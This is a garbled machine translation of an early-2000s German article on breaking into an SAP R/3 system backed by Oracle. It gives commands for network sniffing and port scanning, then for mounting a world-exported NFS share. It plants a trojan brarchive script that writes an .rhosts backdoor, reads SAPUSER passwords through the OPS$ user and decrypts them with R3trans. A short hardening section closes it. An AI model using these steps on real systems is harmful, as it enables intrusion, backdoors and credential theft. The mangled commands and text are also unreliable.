We chop a SAP database Jochen Hein $ Id: ora-hack.xml, v 1.

3 03/01/2002 18:29:36
jhein Exp $ ------------------- -----------------------------------------------
--- -------------------------------------------------- -------------------------
-------------- first How to hack a while SAP's Spa Kids, do not do that at home.
However, we only use standard techniques to each Admin have long been known.
-------------------------------------------------- -----------------------------
1.1. Chop with Unix / network means we know nothing (auer, that there should be
an SAP R / 3 - Fri chances are good an Oracle database) and have a laptop. Zufl
ligerweise we find a wired network socket (or pinch us for fifty with a mini-str
oke). And then we listen to what is to come. SAP R / 3 systems knnen be Availabl
e on many different ports. In general, we find the application server on a port
3200-3299, the message server between 3600 and 3699th The last two digits are th
e so-called system blicherweise number. You can change these ports, although in
the profile, but one can assume that most systems are operated in this configura
tion. Figure 1 shows an example for the call to tcpdump, but there are still oth
er tools. Figure 1 Packet Sniffer # / bin / sh tcpdump-n-i eth0 'tcp [13] & 3! =
0 and \ ((tcp [2:2]> = 3200 tcp [2:2] <3300) or \ 5 (tcp [2:2]> = 3600 tcp [2:2
] <3700)) '
As a result you get only the connection establishment to an application server o
r the message server to see. The first expression tcp [13] & 3! = 0 precisely fi
lters out those TCP packets. Here are just IP addresses and port numbers, no nam
es will be displayed. The result (Figure 2, shown here only verkrzt remember) we
are. Figure 2 Results of the sniffer
192.168.1.1.4722> 192.168.10.1.3200
We know one or more SAP server and knnen it further
. Analyze Overcoming this initial attack is to use a switched network where each
computer sees only the packets, the FR it is intended. There are attacks agains
t switches, hubs, these degenerate, so that after a sniffer can be used again. S
ubjects active in the network addresses, we whlen FR The following is a matching
IP address (in the hope that comes out, we are not). Helpful for the system adm
inistrator wre a tool such as arpwatch, which at least shows the new computer. T
he burglar can use natrlich evening a MAC and IP address of a computer workstati
on - then helps only a Time Restriction and the appropriate monitoring in the ne
twork. With a special Linux system on the laptop to record your fr is the networ
k administrator virtually invisible. The special on that Linux is a kernel patch
(perhaps under http://linux.davecentral.com/projects/stealthkernelpatch/, which
prevents the system to eventually send a package. Otherwise knnte as an Intrusi
on Detection System (IDS ) suggested that a computer is active with a network ca
rd in Promicous mode. nchsten In step we suggest a free IP address (possibly fro
m a night off PC) and use this on our laptop. If it proves prove necessary, to h
ave a DNS access, so you listen to packets to port 53 and Carries the appropriat
e server locally. With a little Glck we come from without (If the name server wi
th the query-log l runs, it bullet Could we be recognized). The program sapgui w
e connect to that machine and this port, so that we have in the status bar, the
system ID (Figure 3). This is also in the use of Oracle equal to the Oracle SID.
If we connect to a port 36nr have found, we try lgtst with the help of the prog
ram is (to get the Unix SAPGUI included) for more information about the system.
In this case, presumably, the load distribution used. Figure 3 Connecting to SAP
GUI SAPGUI / H / victim-IP / S / victim-port
-------------------------------------------------- -----------------------------
1.2. A short detour from here we are in the network active. If the system admin
istrator has an Intrusion Detection System, or port scans or reads respects its
log files, then strike him knnte something. Do it no other network - even in you
r own, you should first talk to your colleagues. You have been warned. Zunchst w
e get out what there is a system Fri (Tools dafr's on every Straenecke). Dependi
ng on the system it may be appropriate to directly attack the system, rootshell
dafr is always a good source. telnet is perhaps the name of the operating system
.
nmap-O-victim IP rtmglicherweise the operating system. This is a Unix system, so
I know my way around. A first,€pretty brazen attempt to log in as root with th
e rlogin command. Yes, sometimes it works great - game over, thank your for play
ing. For Unix systems you can use the command showmount-e find the exported via
NFS directories. With a little Glck important volumes have been released to all
computers, possibly even to write. A shocking example, see Figure 4 Figure 4 NFS
exploit cracker # showmount-e Export list for IP-victim victim-IP: / sapmnt / S
ID (everyone)
5
Aha: here, the air system SID. We see that even with the SAPGUI for the port sca
n. What is much Utilities, however, we'll be able to mount the NFS volume, creat
e a user sidadm and replace any program (yes, this is a practical example that e
xists tatschlich - I find almost fahrlssig ). The user sidadm miter the data of
the R / 3. On Unix, Oracle database, the user Gehrt orasid. The Figure 5 shows a
mgliche approach to replacing Unix programs. With a little Glck fllt on the no
- and if so, is difficult to understand something (or you fhren logs about succe
ssful NFS mounts?). Figure 5 Capture of a Trojan horse cracker # mount-t nfs Vic
tim IP: / sapmnt / SID / mnt # ls-l cracker ... In this list we find the numeric
al user ID of the 5-user Unix sidadm ... # adduser-u number cracker cracker sida
dm # su - sidadm sidadm> cd / mnt / exe sidadm> brarchive mv. brarchive 10 sidad
m> cat> brarchive #! / bin / sh # Create a Hintertr echo my-ip>> $ HOME / .rhost
s # And so it will not start the old program auffllt exec / sapmnt / SID / exe /
.brarchive Ctrl-C sidadm> chmod a + x brarchive
Now just wait a day (nmlich brarchive to nchsten running the Program) and we won
. We knnen without Pawort rlogin with the program as sidadm Register. Thank you
very much for this simple game.
-------------------------------------------------- -----------------------------
1.3. Back to results back to SAP now we are on the search for the database serv
er. A port scan of the computer found above calculator reveals perhaps the messa
ge server, and perhaps an Oracle port. Figure 6 contains a good example. Figure
6 Calling a port scanner nmap-p 3200-3699 <ip-address> nmap-p 1527 <ip-address>
These are the ports of the Dispatcher SAP (32xx), any gateway processes (33xx) a
nd Message Server (36xx). Search for an Oracle listener. There are people who sa
y the would run by default on port 1521st Hm rates prfen: hosts in the Nhe (chan
ge the last digit of the IP address)! For more SAP systems can bring the other s
erver. Auerdem mglicherweise can take advantage of trust relationships between d
ifferent systems - but today is not our goal. Adoption: There is one central ins
tance, database and they can run on a computer. Whether this assumption is true,
one can find out with the program sapinfo. The program is available on the GUI
CD in the RFC SDK. Figure 7 contains another example. Figure 7 The program sapin
fo cracker # sapinfo awhost = ip-address SYSNR n = SAP System Information ------
--------------------------- ------------- Destination Host System ID 10 DB Datab
ase host system SAP DB release 15 SAP kernel release protocol RFC Characters Int
egers Floating 20 P. SAP machine id Time Zone hostname_SID_nr hostname hostname
ORACLE SID SID 40B 40B 011 1100 BIG IE3 320 3600 (Daylight saving time)
5
When a computer with only one network card is now ready. If the computer multi-h
omed, then perhaps we can help the issue of lgtst. Otherwise helps either target
ed rates or access to the DNS server of the victim (if available). We now know:
The IP address (es) of the victim, the system number of the R / 3 system (the la
st two digits of the SAP Ports) The system ID of the system and the Oracle datab
ase to make the name of the database server thus armed we are on to the actual g
oal: to access the SAP database. -----------------------------------------------
--- ----------------------------- 1.4. Erhacken the Oracle database, we create a
SQL NetV2 configuration, which hopefully gives us access to the database. We ne
ed a sqlnet.ora file (standard SAP, see Figure 8) and a tnsnames.ora file (Figur
e 9). With the environment variable TNS_ADMIN we'll be able to specify the path
to these files - but on our laptop (here are the Oracle programs also installed)
as we are free anyway. Figure 8 The file sqlnet.ora ################ # Filename
......: sqlnet.ora # Name ..........: template # 5 Date ..........: ###########
##### AUTOMATIC_IPC TRACE_LEVEL_CLIENT = ON = OFF = 0 10 SQLNET.EXPIRE_TIME NAME
S.DEFAULT_DOMAIN NAME.DEFAULT_ZONE = world = world # SQLNET.AUTHENTICATION_SERVI
CES = (ALL)
Figure 9 The file tnsnames.ora SID.world = (DESCRIPTION = (ADDRESS_LIST = 5 (ADD
RESS = (COMMUNITY = sap.world) (PROTOCOL = TCP) (Host = hostname)
(Port = 1527) 10) (CONNECT_DATA = (SID = SID) (GLOBAL_NAME SID.world =))))
15
If the standard were not Pawrter upd we'll be able connect us with the command s
apr3/sap @ SID in connect svrmgrl with the database. Otherwise, we mssen using t
he OPS $ mechanism of the Oracle database user out of Pawort SAPR3 (Figure 10).
Dafrmssen sidadm we create a user on the laptop. Figure 10 Oracle chop sidadm> s
idadm> sidadm> 5 sidadm> setenv TNS_ADMIN $ HOME / setenv ORACLE_HOME / oracle /
SID setenv ORACLE_SID SID svrmgrl
Oracle Server Manager Release 3.0.6.0.0 - Production (c) Copyright 1999 Oracle C
orporation. All Rights Reserved.
Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production PL / SQL Release 8.0.6
.1.0 - Production SVRMGR> connect / @ SID Connected. SVRMGR> select * from sapus
er; USERID PASSWD ------ ----- SAPR3 secret 1 row selected. SVRMGR> connect SAPR
3/geheim @ SID Connected. SVRMGR> 10
We connect to the database as OPS $-user. This is created in Oracle as identifie
d externally, so that we do not specify Pawort mssen here. Since we do not work
directly on the database server, we specify the SID, this is aufgelst using SQL
NetV2 configuration. With the data stored in the table and now we'll be able SAP
USER Pawort log on to the database. --------------------------------------------
------ ----------------------------- 1.5. Ideas presented there, In the current
SAP R / 3 versions verschlsselt the password in the table
SAPUSER stored. Thus it is not quite so simple - there are two paths you can fol
low: An attack with cryptographic methods to the Verschlsselung. The bullet I wo
uld like to try once, but I miss at least the medium term dafr time. The OSS-150
790 Note makes this idea particularly appealing: Fri Verschlsselung which will
use the general SAP Verschlsselungsroutine. The LSST suspect that you crack adwa
re Passwd from R / 3 users k LOVE JH. install on the laptop, we have used the at
tack Fri knnte you tools such as R3trans and thus gain access to the database. S
ince the Verschlsselung is implemented in R3trans, msste do you without the abov
e analysis, yet have access to all R / 3 data. A quick test shows me the followi
ng: Figure 11 R3trans for database access sidadm> export PATH = "$ PATH: oracle/
SID/817_32/bin /: / usr / sap / SID / SYS / exe / run" sidadm> export dbms_type
= oraexport DIR_LIBRARY = / usr / sap / SID / export SYS / exe / run sidadm> exp
ort dbs_ora_tnsname SID = 5 sidadm> TNS_ADMIN = / home / sidadm sidadm> cat cont
rol export compress = no client = 000 # select table where name = T000 select *
from T000 sidadm> R3trans control .. . 10 sidadm> strings trans.dat ... q 000SAP
AG Walldorf DEM [...] q 001Auslieferungsmandant R11 Kundstadt EUR [...] ...
Here one need only imagine what an attacker knnte do: export clientremove ;-) ta
bles and analysis in a WAS import / IDES and generate a WAS a transport file, eg
with a user with sufficient permissions or many suitable documents. If R3trans
can connect to the database, then you can use tcpdump or dsniff (http://www.monk
ey.org/ ~ dugsong dsniff / /, probably dsniff-s ersniffen 4096 [1]) the password
. Then as usual, the command can be used svrmgrl. Thank Glckwunsch! ------------
-------------------------------------- ----------------------------- 1.6. CONSID
ERATIONS for SAP password Verschlsselung
What SAP called Verschlsselung may, in fact only a disguise. If the Verschlsselu
ng f as a function of the password considered, then the password verschlsselte t
he result of the function f (password). Since programs such as R3trans are able,
without any further settings, the password verschlsselte transform it back into
the plaintext exists a function f-1, fr is the f-1 (f (password)) = password. T
his is the concealment (as shown above) to berlisten very easy because I am able
to let decrypt any password by R3trans veiled. Thus, the cryptographic analysis
of the "Verschlsselung" only by sporting interest - the pragmatic approach is s
imple, the program R3trans Entschlsselung to use the special password. ---------
----------------------------------------- ----------------------------- 1.7. Con
clusion very much for the flowers. The only workaround that is einfllt me to bui
ld a packet filter in front of the Oracle ports and the use of a switched networ
k.€Auerdem you should think about a firewall between the SAP servers and the ne
twork brige. Really. Mglicherweise wre then the NFS Hack failed. More intensive
search in several documents has usually chosen to file protocol.ora. In this fil
e, you can turn with the entry validnode_checking an IP-based check program. The
entry contains invited_nodes then the allowed IP addresses or host names. Figur
e 12 shows a fitting example. Due to an Oracle error, you should never use host
names. Can not be a host name aufgelst, the Zugriffsbeschrnkung is repealed with
out a message everyone can read all the data again! Figure 12 The file protocol.
ora tcp.nodelay = true = yes tcp.validnode_checking tcp.invited_nodes = (IP addr
ess, IP address) five disadvantages of using this configuration is that a new ap
plication server or a system from the transport network (f r test imports) are i
ncluded here mu. They bought the HHer security so more effort and possibly a auf
wndigen troubleshooting if you have forgotten this setting. The real problem Gro
e, in my view is that SAP is installed in the default installation uncertain, in
the Handbchern no information is available about this problem and the fix is we
ll hidden in the OSS. Especially systems with some very schtzenswerten informati
on, such as SAP R / 3 should not show in the default installation of such Lcken.
The problem has been known since 1999, but so far I have not seen any changes i
n the installations. -------------------------------------------------- --------
--------------------- 1.8. OSS Notes and R / 3 versions
186 119 Note, from Table 4.5B is SAPUSER verschlsselt 186 119 Valid in 4.0x, 4.5
x, 4.6x. Lt. Guide does not change from 6:10 Fri WAS/6.10 unit of the database u
ser SAP <SID>: 361 641 Note: Creating the OPS $ user on UNIX R / 3> = 6.10: Use
oradbusr.sql the script ( see also note 50 088). Google Bookmark and Share [1] W
hy is not capturing dsniff Oracle logins? Increase the default snaple with dsnif
f-s 4096th Oracle logins can be quite chatty ...